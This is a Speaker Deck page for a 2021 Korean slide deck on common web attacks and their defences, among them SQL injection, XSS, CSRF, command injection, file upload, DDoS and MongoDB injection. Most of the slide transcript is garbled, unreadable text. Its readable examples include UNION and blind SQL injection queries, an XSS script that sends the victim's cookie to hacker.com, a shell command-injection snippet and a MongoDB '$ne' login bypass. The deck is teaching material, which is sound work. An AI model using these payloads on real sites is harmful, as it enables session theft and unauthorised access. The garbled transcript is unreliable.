Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
웹 개발을 위해 꼭 알아야하는 보안 공격
Search
Lee Sun-Hyoup
February 22, 2021
Programming
0
44
웹 개발을 위해 꼭 알아야하는 보안 공격
통신보안
Lee Sun-Hyoup
February 22, 2021
Tweet
Share
More Decks by Lee Sun-Hyoup
See All by Lee Sun-Hyoup
Railway-Oriented Programming과 Spring
kciter
0
150
Kotlin Script 활용하기
kciter
0
680
MongoDB 이해하기
kciter
0
670
Other Decks in Programming
See All in Programming
[FEConf 2025] 모노레포 절망편, 14개 레포로 부활하기까지 걸린 1년
mmmaxkim
0
1.6k
ProxyによるWindow間RPC機構の構築
syumai
3
1.2k
個人軟體時代
ethanhuang13
0
320
Laravel Boost 超入門
fire_arlo
3
210
私の後悔をAWS DMSで解決した話
hiramax
4
210
今だからこそ入門する Server-Sent Events (SSE)
nearme_tech
PRO
3
210
250830 IaCの選定~AWS SAMのLambdaをECSに乗り換えたときの備忘録~
east_takumi
0
390
CloudflareのChat Agent Starter Kitで簡単!AIチャットボット構築
syumai
2
490
テストコードはもう書かない:JetBrains AI Assistantに委ねる非同期処理のテスト自動設計・生成
makun
0
300
print("Hello, World")
eddie
2
530
複雑なフォームに立ち向かう Next.js の技術選定
macchiitaka
2
110
Updates on MLS on Ruby (and maybe more)
sylph01
1
180
Featured
See All Featured
Facilitating Awesome Meetings
lara
55
6.5k
Design and Strategy: How to Deal with People Who Don’t "Get" Design
morganepeng
131
19k
RailsConf & Balkan Ruby 2019: The Past, Present, and Future of Rails at GitHub
eileencodes
139
34k
Building a Scalable Design System with Sketch
lauravandoore
462
33k
Music & Morning Musume
bryan
46
6.8k
Rails Girls Zürich Keynote
gr2m
95
14k
Designing for humans not robots
tammielis
253
25k
The Illustrated Children's Guide to Kubernetes
chrisshort
48
50k
Why You Should Never Use an ORM
jnunemaker
PRO
59
9.5k
Into the Great Unknown - MozCon
thekraken
40
2k
How To Stay Up To Date on Web Technology
chriscoyier
790
250k
The Power of CSS Pseudo Elements
geoffreycrofte
77
6k
Transcript
ਢѐߊਸਤ೧ ԙঌইঠೞחࠁউҕѺ 2021. 02. 22 ࢶഈ
য়טݾ ਢࠁউী೧೧ೞҊӝୡҕѺӝߨҗ೧Ѿߑߨਸ೧ೠ
ਢࠁউ ਢࢎஂডਸҕѺೞחӝࣿਤഈਵ۽ ਢಕܳాೞৈ ӂೠহחदझమীӔೞѢաؘఠਬ߂Ҧ৬э೯ਤ݈ܳೠ https://ko.wikipedia.org/wiki/ਢ_೧ఊ
None
ೠࣽрपࣻ۽ࢲ࠺झоݎೡࣻب😨
ցޖনೠҕѺӝߨj 42-*OKFDUJPO 944 $43'"UUBDL 'JMF6QMPBE"UUBDL $PNNBOE*OKFDUJPO #VGGFS0WFSGMPX %JDUJPOBSZ"UUBDL
ࠗחইפ؊ۄبӝୡੋѪ ԙঌইىঠೠ
ঌইঠೞחҕѺӝߨ 4UBSU
42-*OKFDUJPO ↟ࢲߡীࢲप೯غח42-ਸঈਵ۽ਊೞחҕѺ ↟ӝઓ42-ীঈੋ42-ਸੑೠ ↟ؘఠఎஂ ઁ١оמೞ ↟ڦܻݶࢲ࠺झઙܐп
42-*OKFDUJPOࢎ۹
42-*OKFDUJPOࢎ۹
42-*OKFDUJPOߑয ↟42-ীࢲౠ߹ೠܳоחޙܳझாೠ FY =O =U ] j
↟ળ࠺ػࢶਸࢎਊೠ ↟ਃ્ۄ࠳۞ܻ ۨਕীࢲইੜ݄ইળ
42-*OKFDUJPOबച ↟&SSPSCBTFE42-*OKFDUJPO ↟ੌࠗ۞42-ী۞ܳߊࢤदெਗೞחࠁܳஂٙೠ ↟௪ܻޙ୶ஏ %#ݺ ప࠶ݺ١ஂٙоמೞ
42-*OKFDUJPOबച ↟#MJOE42-*OKFDUJPO ↟2VFSZѾҗଵѢਸࠁҊਗೞחࠁо ઓೞחঌࣻ ୶ۿ ↟%# 5BCMFݺਸঌࣻ ↟42-.BQ ex)
SELECT * FROM users WHERE user_id = '1' and substring(database(),1,2)='us'#
42-*OKFDUJPOबച ↟6OJPO42-*OKFDUJPO ↟6OJPOݺ۸ਸਊೞৈࠁܳஂٙೠ ex) SELECT * FROM users WHERE user_id
= '1' or 1=1 UNION SELECT '',id,pw from users#
944 ↟$SPTF4JUF4DSJQUJOH ↟ਢಕীঈࢿझ݀ܳੑೞחҕѺ ↟ࢎਊࠁܳఎஂೡࣻ ↟ڦܻݶ݆Ѫਸח
944ࢎ۹ <script>document.URL='http://hacker.com?'+document.cookie</script> ѱद౸ ਊо Ӗਸ ੍ਸ ٸ ష ఎஂ!!!
944ߑয ↟)5.-ఠ݂ਸೠറ%#ীೠ FY TDSJQU IUNM IFBE NFUB jj
↟݅ডਸਤ೧ۿূ٘ীࢲبఠ݂ೠ
944बച ↟খࢲࣗѐೠߑध4UPSFE944 ↟3FGMFDUFE944 ↟%0.#BTFE944
944बച ↟3FGMFDUFE944 ↟Ѩ࢝য١ਸࠁৈחҔীझ݀ܳबחҕѺ ↟63-ਸࢎਊীѱ־ܰѱٜ݅ݶҕѺࢿҕ https://papago.naver.com/?sk=ko&tk=en&st=<script>…</script>
944बച ↟%0.#BTFE944 ↟%0.ীঈੋझ݀ܳबחҕѺ ↟࠳ۄо೧ࢳೞחױ҅ীࢲߊࢤغחҕѺ
$43'"UUBDL ↟$SPTT4JUF3FRVFTU'PSHFSZ ↟ҕѺоࢎਊܳਊೞৈਢࢎী ਃਸࠁղחҕѺ
$43'"UUBDLࢎ۹ о admin 1q2w3e4r ۽Ӓੋ ਃ ࢿҕ/पಁ ࢿҕ೮ਵݶ
$43'"UUBDLߑয ↟3FGFSSFS$IFDL ↟ೲਊೠبݫੋ݅ਃೲۅೞب۾ࢸ ↟$43'5PLFO ↟ݽٚਃীషਸߊәೞৈࢲߡীࢲѨૐ ↟$"15$)" ↟ࢎۈਃೠѪݏחѨૐ
$PNNBOE*OKFDUJPO ↟গܻா࣌ীࢲࢎਊغחदझమݺ۸ীঈੋ ݺ۸যܳੑೞחҕѺ 8FC4IFMM"UUBDL ↟ࢲߡSPPUӂೠਸஂٙೡࣻ ↟ڦܻݶࢲ࠺झઙܐп
$PNNBOE*OKFDUJPOࢎ۹ )BDLFS UFYUUYUJGDPOGJH system("cat ${var}") FYFDVUF 8FC4IFMM
$PNNBOE*OKFDUJPOߑয ↟оәदझమೣࣻחࢎਊ9 ↟хೠޙܳఠ݂ FY ]
'JMF6QMPBE"UUBDL ↟ঈࢿझ݀ੌਸস۽٘ೞחҕѺ ↟স۽٘റੌਤܳইप೯दఃݶҕѺࢿҕ ↟ڦܻݶࢲ࠺झઙܐп
'JMF6QMPBE"UUBDLࢎ۹ Upload 1 2 Command WebShell
'JMF6QMPBE"UUBDLߑয ↟ഛੌఋੑѨࢎ ↟স۽٘ੌਸդࣻചೞৈ ↟ౠࣻޙоನೣػ҃স۽٘Ә (Null byte Injection ߑয)
+BWBTDSJQU*OKFDUJPO ↟$MJFOU4JEFীࢲ+BWBTDSJQUܳੑदఃחҕѺ ↟܁DPOTPMF١ਸా೧ઑоמೞ ↟$MJFOU4JEFীхೠؘఠܳ֍ਸ҃ఎஂоמ
+BWBTDSJQU*OKFDUJPOࢎ۹
+BWBTDSJQU*OKFDUJPOߑয ↟$MJFOU4JEFূхೠࠁܳ֍ঋח ↟ؘఠਬബࢿѨࢎоਃೠ҃ࢲߡ৬ాनೠ $MJFOUীࢲѨࢎೞݶউػ
%%P4 ↟%JTUSJCVUFE%FOJBMPG4FSWJDF ↟ࢲߡী࠺࢚ਵ۽݆ېਸࠁղחҕѺ ↟ࢲ࠺झо݃࠺غҊ݆࠺ਊࣗݽػ
%%P4ࢎ۹ Zombie PC Traffic
%%P4ߑয ↟ઁੌױࣽೠؘઁੌ݄ӝয۵ ↟ഛоמೠࢲ࠺झҳઑࢸ҅ ↟*1ఠ݂ ↟ࣛܖ࣌ҳݒj
%JDUJPOBSZ"UUBDL ↟ܻࢎী١۾೧֬ޙৌਸঐഐ۽ੑೞחҕѺ ↟#SVUF'PSDFੌઙ
%JDUJPOBSZ"UUBDLࢎ۹ admin apple banana cyber . . . 1q2w3e4r
%JDUJPOBSZ"UUBDLߑয ↟оחޙৌঐഐ۽١۾ޅೞب۾ࢸ ↟"DDPVOU-PDLPVU1PMJDZ ↟GBDUPSੋૐ
3BJOCPX5BCMF ↟೧दೣࣻܳਊೠಣޙਸݽفदெ֬ ↟҅ఎஂറঐഐਗޙਸঌইղӝਤ೧ࢎਊ
3BJOCPX5BCMFߑয ↟4BMUࢎਊ ↟,FZ4USFUDIJOH ↟1#,%' #DSZQU١ঐഐചঌҊ્ܻࢎਊ
.POHP%#*OKFDUJPO ↟42-*OKFDUJPOۢঈੋчਸ֍য %#ܳઑೞחҕѺ ↟ڦܻݶࢲ࠺झઙܐп
.POHP%#*OKFDUJPOࢎ۹ db.collection.find({ "email": "
[email protected]
", "password": password }) db.collection.find({ "email": "
[email protected]
",
"password": { "$ne": "-" }) password = { "$ne": "-" }
.POHP%#*OKFDUJPOߑয ↟ೱਸࣻחޙܳఠ݂ೠ FY \ ^ < >
#VGGFS0WFSGMPX ↟#VGGFS0WFSGMPXܳా೧ܲݫݽܻীӔೞחҕѺ ↟ܲݫݽܻীӔ߂ઁযооמೞӝٸޙীݺ ↟दझమ೧ఊӝߨӝبೞ ↟ڦܻݶࢲ࠺झઙܐп
None